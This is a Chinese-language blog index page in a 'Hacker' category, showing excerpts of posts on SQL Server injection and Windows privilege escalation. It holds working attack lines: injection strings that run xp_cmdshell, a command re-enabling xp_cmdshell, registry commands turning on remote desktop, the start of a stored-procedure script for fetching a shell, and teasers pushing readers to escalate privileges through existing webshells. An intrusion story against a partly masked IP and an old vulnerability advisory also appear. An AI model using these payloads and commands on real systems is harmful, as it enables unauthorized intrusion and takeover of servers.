分类: Hacker预览模式: 普通 | 列表

MSSQL注入提权的一些方法

MSSQL注入提权思路:
SA权限:利用XP_CMDSHELL,Sp_OACreate等储存过程直接提权.(前提储存过程健在)
相关SQL语句
XP_CMDSHELL:
数字型;EXEC MASTER.DBO.XP_CMDSHELL 'CMDLINE'--
字符型&搜索型';EXEC MASTER.DBO.XP_CMDSHELL 'CMDLINE'--

查看更多...

Tags: sql 注入

分类:Hacker | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 9406

突破xp_cmdshell被删xml.http下载拿SHELL

注意以下语句在SA权限下执行,对于N多扩展存储过程被删除时使用效果最佳。
DECLARE
@B varbinary(8000),
@hr int,
@http INT,
@down INT

查看更多...

分类:Hacker | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 5939

SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。

SQL2005 在默认的设置中是删除了 XP_CMDSHELL的

遇到这种情况可以用下面一句话解决

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--

 

Tags: sql

分类:Hacker | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 6485

2003系统cmd开3389且不用重启

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f

查看更多...

分类:Hacker | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 5149

一次简单的渗透经过

笔者的一位朋友应聘到一家公司做网管,据说整个机房就他们俩人,工作很轻松。几乎是没什么事做,但是昨天突然给我打电话说是机房被入侵了,被人加了很多用户并且什么cain,arpspoof全都丢到服务器上了,想让笔者帮忙看看是怎么渗透进去的,于是乎在敲诈了一顿烤鸭之后笔者终于出手了。在经过朋友的同意之后特意将本文写出来!

一.渗透前的踩点:

这哥们也够狠,除了丢给我个IP其他什么都没给我!IP是202.108.59.XX。没办法,自食其力。用superscan扫了下,发现开了21.80.1433 这三个端口,因为我只扫1-3389 。并没看见终端的3389。看来这家伙是怕了,直接把3389给关掉了。 用旁注的工具检测了下,发现服务器有两个网站。两个都是ASP的站,不用多说了。先寻找注射点吧,使用两个啊D都打开google 搜索site:xxxx.com,一页显示一百条,扫了半天只发现一个站有注射点,居然还是SA权限!不被黑才怪!

查看更多...

分类:Hacker | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2307

mssql注入整理

恢复xp_cmdshell

方法1:查询分离器连接后执行:
if exists (select * from
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)

查看更多...

Tags: sql

分类:Hacker | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 5111

Microsoft XML Core Services SubstringData堆溢出漏洞

受影响系统:
Microsoft Office SharePoint Server
Microsoft Office Groove Server 2007
Microsoft Office 2007
Microsoft Office 2003 Service Pack 2
Microsoft Windows XP SP2
Microsoft Windows Vista
Microsoft Windows Server 2003 SP2
Microsoft Windows Server 2003 SP1
Microsoft Windows 2000SP4
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 25301
CVE(CAN) ID: CVE-2007-2223

Microsoft Windows是微软发布的非常流行的操作系统。

Windows XML Core程序库在处理畸形畸形的调用时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。

XML Core Services(也被称为MSXML)是Windows操作系统中所安装的用于处理XML文件的函数库。在使用该函数库时没有对XMLDOM对象substringData()方式的长度参数执行正确的检查,如果提供了超长的长度值的话,就可能将数据拷贝到不充分的缓冲区,触发堆溢出,导致执行任意指令。

查看更多...

Tags: 漏洞 xml

分类:Hacker | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2500

利用本地漏洞Windows Token Kidnapping进行网站提权

作者:hackest [H.S.T.]
此文章已发表在《黑客X档案》2008年第11期杂志上
后经作者发布在博客上,如转载请务必保留此信息!
话说很久很久没有爆过Windows下比较有影响的漏洞了,这回终于微软也可爱了一回,爆了个可以让大家爽歪歪的本地权限提升漏洞。如果你手里有一大批以前提不了权限的Webshell的话,看完本文之后就赶紧拿出来提权去,效果还是蛮不错的。因为微软并没有修补这一漏洞,只是在安全公告里做了提醒(详见http://www.microsoft.com/technet/security/advisory/951306.mspx)。
受此漏洞影响的系统:

查看更多...

Tags: Churrasco 漏洞

分类:Hacker | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2637